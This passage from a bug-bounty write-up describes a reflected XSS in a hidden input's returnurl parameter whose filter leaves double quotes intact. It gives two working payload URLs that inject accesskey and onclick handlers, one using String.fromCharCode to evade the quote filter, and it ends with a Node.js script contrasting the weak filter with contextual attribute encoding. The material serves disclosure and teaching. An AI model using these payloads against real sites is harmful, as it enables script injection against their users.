…where the input has been sanitized for the ‘ < > characters.
I came across a web application on a bounty program where the returnurl parameter was reflected into the following HTML:
<input type="hidden" name="returnurl" value="[USER INJECT]" />
The security filter removed the < > ’ characters but left the double quote intact and reflected.
What’s the first thing that comes to mind?
Also, you can’t style a hidden input to make the field visible, so a handler that needs the user to see and click the element won’t work.
http://victim/?returnurl=" accesskey="X" onclick="alert(document.domain)
<input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" />
To make the report stronger, and also to bypass their single-quote filtering, I also sent the following XSS vector:
http://victim/?returnurl=" accesskey="X" onclick="alert(String.fromCharCode(39,89,111,117,32,103,111,116,32,88,83,83,101,100,33,39))
It requires more user interaction but might give the bug appreciation program the Woooo! Factor 🙂
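As an added example (not code from the original post or from the affected application), the following Node.js script models the filter described above (strip < > and ' but leave " alone) beside proper attribute-value encoding, renders both vectors from the post into the same hidden-input template, and runs a simple integrity check over the result. The function names, the weakFilter() model and the check itself are assumptions made for the illustration.

```javascript
// Added example, not code from the original post: why stripping < > ' is not
// enough when user input lands inside a double-quoted attribute, and what the
// fix (contextual output encoding) looks like. Node.js; all names are assumed.

// Model of the filter the post describes: < > and ' are removed, " survives.
function weakFilter(s) {
  return s.replace(/[<>']/g, '');
}

// Output encoding for a double-quoted attribute value: every character that
// can close the quotes or start an entity becomes an entity itself.
function encodeAttr(s) {
  const map = { '&': '&amp;', '"': '&quot;', '<': '&lt;', '>': '&gt;', "'": '&#39;' };
  return s.replace(/[&"<>']/g, ch => map[ch]);
}

// The template from the post, rendered with a chosen encoder.
function render(value, encoder) {
  return `<input type="hidden" name="returnurl" value="${encoder(value)}" />`;
}

// Attribute names as a browser would see them on the rendered tag
// (simple tokenizer for double-quoted attributes, enough for this template).
function attributeNames(tag) {
  const names = [];
  const re = /\s([a-zA-Z-]+)="[^"]*"/g;
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// The hidden input is only supposed to carry type, name and value. Any extra
// attribute, and in particular an on* handler, means the value escaped its quotes.
function hiddenInputIsIntact(tag) {
  const names = attributeNames(tag);
  return JSON.stringify(names) === JSON.stringify(['type', 'name', 'value'])
    && !names.some(n => n.startsWith('on'));
}

// Both vectors quoted in the post (the returnurl value, URL-decoded).
const VECTORS = [
  '" accesskey="X" onclick="alert(document.domain)',
  '" accesskey="X" onclick="alert(String.fromCharCode(39,89,111,117,32,103,111,116,32,88,83,83,101,100,33,39))',
];

// Render each vector through both encoders and report what the browser gets.
function demo() {
  return VECTORS.map(v => ({
    weakAttrs: attributeNames(render(v, weakFilter)),
    weakIntact: hiddenInputIsIntact(render(v, weakFilter)),
    safeAttrs: attributeNames(render(v, encodeAttr)),
    safeIntact: hiddenInputIsIntact(render(v, encodeAttr)),
  }));
}

console.log(JSON.stringify(demo(), null, 2));
```

With the weak filter both vectors pass through untouched and the rendered tag gains accesskey and onclick attributes, which is exactly what the post shows; with encodeAttr the whole string stays inside value and the tag keeps only its three expected attributes. The point for the fix is that the encoding has to match the output context (a double-quoted attribute here), not a fixed blocklist of characters.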